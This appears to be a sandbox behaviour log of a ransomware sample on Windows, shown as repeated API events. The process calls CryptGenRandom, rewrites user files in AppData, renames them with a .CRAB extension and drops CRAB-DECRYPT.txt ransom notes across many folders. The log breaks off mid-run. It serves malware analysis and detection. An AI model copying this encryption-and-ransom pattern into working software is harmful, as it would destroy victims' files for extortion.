| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, size = 1048576, size_out = 251449 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, size = 251456 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, size = 1048576, size_out = 284802 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, size = 284816 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, size = 1048576, size_out = 294525 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, size = 294528 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, size = 1048576, size_out = 270642 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, size = 270656 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, size = 1048576, size_out = 217578 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, size = 217584 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, size = 1048576, size_out = 255219 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, size = 255232 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, size = 1048576, size_out = 251336 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, size = 251344 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, size = 1048576, size_out = 344662 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, size = 344672 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576, size_out = 560327 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 560336 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\Chs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\Chs\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl, size = 1048576, size_out = 37730 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl, size = 37744 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
